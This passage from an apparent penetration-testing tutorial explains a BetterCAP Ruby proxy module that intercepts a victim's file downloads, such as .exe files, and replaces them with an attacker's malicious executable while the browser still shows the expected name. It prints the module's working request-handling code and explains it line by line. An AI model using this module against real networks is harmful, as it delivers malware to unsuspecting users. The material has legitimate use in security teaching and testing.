The Ruby file injection proxy module – replace_file.rb

A crash-course in Ruby is beyond the scope of the discussion here, but some basic programming background should be enough to see that there isn't really a lot going on here. This is good news for those of us who were worried that writing custom modules for BetterCAP would be out of reach without significant coding skill. Take a look at this module, written by the author of BetterCAP:

  def on_request( request, response )
    if request.path.include?(".#{@@extension}")
      BetterCap::Logger.info "Replacing http://#{request.host}#{request.path} with #{@@filename}."

      response['Content-Length'] = @@payload.bytesize
      response.body = @@payload
    end
  end
end

Most of this code is defining the inputs, user-friendly descriptions of the options, and a little error handling. The meat and potatoes are at the end, where the on_request method is defined. There's only an if statement:

if request.path.include?(".#{@@extension}")

The code is checking the path of the victim's requested URL for the file extension we define. If we're replacing .exe files, then a request path with .exe will trigger the condition, and BetterCap::Logger.info returns a notice to the attacker in BetterCAP's terminal window:

response['Content-Length'] = @@payload.bytesize
response.body = @@payload

The Content-Length header is replaced with the actual size of our payload (namely, the malicious executable) and the body is the actual binary payload. This is important because only the payload is being replaced; all the other packets that are informing the application layer are genuinely from the requested site. This means that if a user is clicking a link for a file called example.exe, then the browser will show example.exe being downloaded regardless of what the source executable sitting on Kali is named.